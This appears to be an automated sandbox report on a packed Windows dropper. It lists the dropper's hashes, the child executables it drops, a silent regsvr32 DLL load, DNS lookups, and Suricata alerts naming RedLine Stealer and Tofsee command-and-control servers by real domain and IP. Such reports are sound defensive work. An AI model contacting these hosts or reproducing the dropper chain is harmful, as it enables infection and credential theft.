Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Sept. 14, 2023, 7:14 p.m.	Sept. 14, 2023, 7:23 p.m.

Size	7.5MB
Type	PE32+ executable (GUI) x86-64, for MS Windows
MD5	`24fbc8705072bb32a6ac2fc995a66f17`
SHA256	`69ded352d815114251f0986f1f9d16702f1b33372c23fe8de2cd18ddab231e13`
CRC32	`342D657F`
ssdeep	`196608:1/26U9PTHjFEewj925ecIj3uauDXdeRCpParPWNZPfOvjqOe:1u6AzpE/4QnuDde05ge3PWvjI`
Yara	UPX_Zero - UPX packed file Malicious_Library_Zero - Malicious_Library PE_Header_Zero - PE File Signature IsPE64 - (no description) VMProtect_Zero - VMProtect packed file

WWW14_64.exe "C:\Users\test22\AppData\Local\Temp\WWW14_64.exe"
1460
- nbHH0jE8qZJ4tNguvouaT8ug.exe "C:\Users\test22\Pictures\Minor Policy\nbHH0jE8qZJ4tNguvouaT8ug.exe"
  2740
- LCfgNNO96dWppNu7PMj50Yzc.exe "C:\Users\test22\Pictures\Minor Policy\LCfgNNO96dWppNu7PMj50Yzc.exe"
  2732
  - regsvr32.exe "C:\Windows\System32\regsvr32.exe" -s F652w.85
    2140
- cikl6UFkXU4cZQ6sFNhet5qr.exe "C:\Users\test22\Pictures\Minor Policy\cikl6UFkXU4cZQ6sFNhet5qr.exe"
  2748
- jO0KmIb4n4ZjS9AOGznw9fMl.exe "C:\Users\test22\Pictures\Minor Policy\jO0KmIb4n4ZjS9AOGznw9fMl.exe"
  2892
- ldEQBC8aeCgL1Jw4jA1tloQg.exe "C:\Users\test22\Pictures\Minor Policy\ldEQBC8aeCgL1Jw4jA1tloQg.exe"
  2916
- z0cXWJOzi1YW10CuQRQjMRie.exe "C:\Users\test22\Pictures\Minor Policy\z0cXWJOzi1YW10CuQRQjMRie.exe"
  2932
  - vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
    1960
- 0Sg4p2isyE32UOnHiUlFNypw.exe "C:\Users\test22\Pictures\Minor Policy\0Sg4p2isyE32UOnHiUlFNypw.exe"
  2924
- ZcWmEJj67YVTAJcMEmzlUq_H.exe "C:\Users\test22\Pictures\Minor Policy\ZcWmEJj67YVTAJcMEmzlUq_H.exe"
  2968

Name	Response	Post-Analysis Lookup
preconcert.pw	A 104.21.84.222 A 172.67.197.101	104.21.84.222
230907161118223.nmr.xrm42.top	A 179.43.158.2 A 94.156.35.76	94.156.35.76
vk.com	A 87.240.129.133 A 87.240.132.72 A 87.240.132.78 A 87.240.137.164 A 93.186.225.194 A 87.240.132.67	93.186.225.194
apps.identrust.com	A 182.162.106.33 CNAME a1952.dscq.akamai.net A 182.162.106.32 CNAME identrust.edgesuite.net	61.111.58.35
sun6-21.userapi.com	A 95.142.206.1	95.142.206.1
sun6-20.userapi.com	A 95.142.206.0	95.142.206.0
verypayment.net	A 172.67.148.157 A 104.21.95.210	172.67.148.157
marrakechchoralmeeting.ma	A 178.63.45.64	178.63.45.64
ipinfo.io	A 34.117.59.81	34.117.59.81
z.nnnaajjjgc.com	A 156.236.72.121	156.236.72.121
ji.alie3ksgbb.com	A 172.67.200.102 A 104.21.90.117	172.67.200.102
psv4.userapi.com	A 87.240.137.134 A 87.240.190.89 CNAME ps.userapi.com A 87.240.190.76 A 87.240.137.140	87.240.190.76
api.myip.com	A 172.67.75.163 A 104.26.9.59 A 104.26.8.59	104.26.9.59
sergejbukotko.com	A 172.67.214.144 A 104.21.59.53	104.21.59.53
sun6-23.userapi.com	A 95.142.206.3	95.142.206.3
iplis.ru	A 148.251.234.93	148.251.234.93

IP Address	Status	Action
104.21.95.210	Active	Moloch
104.26.8.59	Active	Moloch
148.251.234.93	Active	Moloch
156.236.72.121	Active	Moloch
164.124.101.2	Active	Moloch
172.67.197.101	Active	Moloch
172.67.200.102	Active	Moloch
172.67.214.144	Active	Moloch
176.123.9.85	Active	Moloch
178.63.45.64	Active	Moloch
182.162.106.32	Active	Moloch
185.225.73.32	Active	Moloch
185.225.74.51	Active	Moloch
193.42.32.118	Active	Moloch
34.117.59.81	Active	Moloch
45.15.156.229	Active	Moloch
45.9.74.80	Active	Moloch
87.240.129.133	Active	Moloch
87.240.132.78	Active	Moloch
87.240.137.134	Active	Moloch
87.240.137.140	Active	Moloch
94.156.35.76	Active	Moloch
95.142.206.0	Active	Moloch
95.142.206.1	Active	Moloch
95.142.206.3	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.103:49167 -> 87.240.132.78:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49167 -> 87.240.132.78:80	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49165 -> 34.117.59.81:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.103:49165 -> 34.117.59.81:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49165 -> 34.117.59.81:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.103:49165 -> 34.117.59.81:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.103:49169 -> 87.240.132.78:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49178 -> 172.67.197.101:80	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49163 -> 193.42.32.118:80	2045779	ET MALWARE Win32/BeamWinHTTP CnC Activity M2 (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49171 -> 87.240.132.78:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49180 -> 172.67.197.101:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49180 -> 172.67.197.101:80	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49186 -> 172.67.197.101:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49176 -> 172.67.214.144:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49176 -> 172.67.214.144:80	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49189 -> 87.240.132.78:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49189 -> 87.240.132.78:80	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 172.67.200.102:80 -> 192.168.56.103:49177	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 172.67.197.101:80 -> 192.168.56.103:49178	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49175 -> 87.240.132.78:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49175 -> 87.240.132.78:80	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49181 -> 172.67.214.144:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49182 -> 172.67.197.101:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49184 -> 172.67.214.144:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49164 -> 104.26.8.59:443	2042969	ET INFO Observed External IP Lookup Domain in TLS SNI (api .myip .com)	Device Retrieving External IP Address Detected
TCP 192.168.56.103:49164 -> 104.26.8.59:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49168 -> 87.240.132.78:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49168 -> 87.240.132.78:80	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
UDP 192.168.56.103:64178 -> 164.124.101.2:53	2016778	ET DNS Query to a *.pw domain - Likely Hostile	Potentially Bad Traffic
TCP 192.168.56.103:49179 -> 172.67.214.144:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49179 -> 172.67.214.144:80	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49190 -> 104.21.95.210:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49191 -> 87.240.132.78:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49191 -> 87.240.132.78:80	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49193 -> 87.240.132.78:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49193 -> 87.240.132.78:80	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49200 -> 87.240.132.78:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49200 -> 87.240.132.78:80	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49197 -> 87.240.132.78:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49197 -> 87.240.132.78:80	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49194 -> 87.240.132.78:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49194 -> 87.240.132.78:80	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49198 -> 87.240.132.78:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49205 -> 87.240.132.78:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49203 -> 87.240.132.78:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49203 -> 87.240.132.78:80	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49204 -> 87.240.132.78:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49204 -> 87.240.132.78:80	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49202 -> 87.240.132.78:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49202 -> 87.240.132.78:80	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49215 -> 87.240.137.134:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49209 -> 87.240.132.78:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49192 -> 87.240.132.78:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49192 -> 87.240.132.78:80	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49174 -> 87.240.132.78:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49174 -> 87.240.132.78:80	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49212 -> 87.240.132.78:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49220 -> 95.142.206.1:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49218 -> 95.142.206.0:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49217 -> 87.240.132.78:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49221 -> 95.142.206.3:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49230 -> 45.15.156.229:80	2045779	ET MALWARE Win32/BeamWinHTTP CnC Activity M2 (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49246 -> 156.236.72.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49249 -> 156.236.72.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49260 -> 176.123.9.85:16482	2043233	ET INFO Microsoft net.tcp Connection Initialization Activity	Potentially Bad Traffic
TCP 192.168.56.103:49260 -> 176.123.9.85:16482	2046045	ET MALWARE [ANY.RUN] RedLine Stealer Related (MC-NMF Authorization)	A Network Trojan was detected
TCP 192.168.56.103:49260 -> 176.123.9.85:16482	2046105	ET MALWARE Redline Stealer TCP CnC Activity - MSValue (Outbound)	A Network Trojan was detected
TCP 192.168.56.103:49260 -> 176.123.9.85:16482	2046105	ET MALWARE Redline Stealer TCP CnC Activity - MSValue (Outbound)	A Network Trojan was detected
TCP 148.251.234.93:443 -> 192.168.56.103:49259	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 176.123.9.85:16482 -> 192.168.56.103:49260	2046056	ET MALWARE Redline Stealer Activity (Response)	A Network Trojan was detected
TCP 192.168.56.103:49266 -> 156.236.72.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49232 -> 156.236.72.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49240 -> 156.236.72.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49241 -> 185.225.73.32:44973	2043233	ET INFO Microsoft net.tcp Connection Initialization Activity	Potentially Bad Traffic
TCP 192.168.56.103:49270 -> 87.240.129.133:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49270 -> 87.240.129.133:80	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49241 -> 185.225.73.32:44973	2046045	ET MALWARE [ANY.RUN] RedLine Stealer Related (MC-NMF Authorization)	A Network Trojan was detected
TCP 192.168.56.103:49241 -> 185.225.73.32:44973	2046105	ET MALWARE Redline Stealer TCP CnC Activity - MSValue (Outbound)	A Network Trojan was detected
TCP 192.168.56.103:49241 -> 185.225.73.32:44973	2046105	ET MALWARE Redline Stealer TCP CnC Activity - MSValue (Outbound)	A Network Trojan was detected
TCP 192.168.56.103:49276 -> 156.236.72.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 156.236.72.121:443 -> 192.168.56.103:49250	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 156.236.72.121:443 -> 192.168.56.103:49277	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.103:49252 -> 156.236.72.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49280 -> 156.236.72.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49269 -> 156.236.72.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 156.236.72.121:443 -> 192.168.56.103:49282	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.103:49242 -> 185.225.74.51:44767	2043233	ET INFO Microsoft net.tcp Connection Initialization Activity	Potentially Bad Traffic
TCP 192.168.56.103:49274 -> 87.240.129.133:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49274 -> 87.240.129.133:80	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49287 -> 156.236.72.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49242 -> 185.225.74.51:44767	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49242 -> 185.225.74.51:44767	2046045	ET MALWARE [ANY.RUN] RedLine Stealer Related (MC-NMF Authorization)	A Network Trojan was detected
TCP 156.236.72.121:443 -> 192.168.56.103:49288	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 185.225.74.51:44767 -> 192.168.56.103:49242	2043234	ET MALWARE Redline Stealer TCP CnC - Id1Response	A Network Trojan was detected
TCP 192.168.56.103:49286 -> 87.240.129.133:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 156.236.72.121:443 -> 192.168.56.103:49257	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.103:49256 -> 148.251.234.93:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 156.236.72.121:443 -> 192.168.56.103:49296	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.103:49242 -> 185.225.74.51:44767	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49285 -> 156.236.72.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49242 -> 185.225.74.51:44767	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 185.225.74.51:44767 -> 192.168.56.103:49242	2046056	ET MALWARE Redline Stealer Activity (Response)	A Network Trojan was detected
TCP 192.168.56.103:49302 -> 156.236.72.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49242 -> 185.225.74.51:44767	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49242 -> 185.225.74.51:44767	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49309 -> 87.240.129.133:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49309 -> 87.240.129.133:80	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49313 -> 87.240.129.133:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49315 -> 87.240.129.133:80	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49313 -> 87.240.129.133:80	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 87.240.129.133:80 -> 192.168.56.103:49315	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49323 -> 156.236.72.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
UDP 192.168.56.103:52004 -> 164.124.101.2:53	2023883	ET DNS Query to a *.top domain - Likely Hostile	Potentially Bad Traffic
TCP 192.168.56.103:49318 -> 87.240.129.133:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49325 -> 156.236.72.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49316 -> 156.236.72.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49324 -> 94.156.35.76:80	2022896	ET HUNTING SUSPICIOUS Firesale gTLD EXE DL with no Referer June 13 2016	A Network Trojan was detected
TCP 192.168.56.103:49326 -> 87.240.129.133:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49324 -> 94.156.35.76:80	2023882	ET INFO HTTP Request to a *.top domain	Potentially Bad Traffic
TCP 192.168.56.103:49319 -> 87.240.129.133:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49324 -> 94.156.35.76:80	2022896	ET HUNTING SUSPICIOUS Firesale gTLD EXE DL with no Referer June 13 2016	A Network Trojan was detected
TCP 156.236.72.121:443 -> 192.168.56.103:49332	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.103:49195 -> 87.240.132.78:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 156.236.72.121:443 -> 192.168.56.103:49338	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.103:49348 -> 156.236.72.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49199 -> 87.240.132.78:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 156.236.72.121:443 -> 192.168.56.103:49342	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 87.240.132.78:80 -> 192.168.56.103:49201	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49344 -> 156.236.72.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 87.240.132.78:80 -> 192.168.56.103:49206	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49216 -> 87.240.132.78:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49213 -> 87.240.132.78:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49219 -> 87.240.132.78:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49229 -> 156.236.72.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 156.236.72.121:443 -> 192.168.56.103:49243	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.103:49337 -> 156.236.72.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49340 -> 156.236.72.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49262 -> 156.236.72.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49334 -> 87.240.129.133:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49271 -> 156.236.72.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 156.236.72.121:443 -> 192.168.56.103:49272	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.103:49281 -> 156.236.72.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49278 -> 87.240.129.133:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 156.236.72.121:443 -> 192.168.56.103:49292	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.103:49295 -> 156.236.72.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 156.236.72.121:443 -> 192.168.56.103:49305	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.103:49311 -> 156.236.72.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 156.236.72.121:443 -> 192.168.56.103:49320	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 156.236.72.121:443 -> 192.168.56.103:49327	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.103:49329 -> 156.236.72.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49341 -> 156.236.72.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49336 -> 87.240.137.140:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 156.236.72.121:443 -> 192.168.56.103:49233	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.103:49234 -> 104.26.8.59:443	2042969	ET INFO Observed External IP Lookup Domain in TLS SNI (api .myip .com)	Device Retrieving External IP Address Detected
TCP 192.168.56.103:49234 -> 104.26.8.59:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49234 -> 104.26.8.59:443	2042969	ET INFO Observed External IP Lookup Domain in TLS SNI (api .myip .com)	Device Retrieving External IP Address Detected
TCP 192.168.56.103:49245 -> 34.117.59.81:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.103:49245 -> 34.117.59.81:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49245 -> 34.117.59.81:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.103:49245 -> 34.117.59.81:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.103:49255 -> 156.236.72.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 156.236.72.121:443 -> 192.168.56.103:49263	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.103:49265 -> 156.236.72.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49291 -> 156.236.72.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49294 -> 156.236.72.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49298 -> 156.236.72.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49299 -> 156.236.72.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49304 -> 156.236.72.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49310 -> 156.236.72.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49308 -> 45.9.74.80:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 156.236.72.121:443 -> 192.168.56.103:49312	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.103:49307 -> 87.240.129.133:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49307 -> 87.240.129.133:80	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49308 -> 45.9.74.80:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49317 -> 156.236.72.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49345 -> 156.236.72.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 156.236.72.121:443 -> 192.168.56.103:49346	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.103:49237 -> 156.236.72.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49261 -> 156.236.72.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 156.236.72.121:443 -> 192.168.56.103:49267	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.103:49275 -> 156.236.72.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
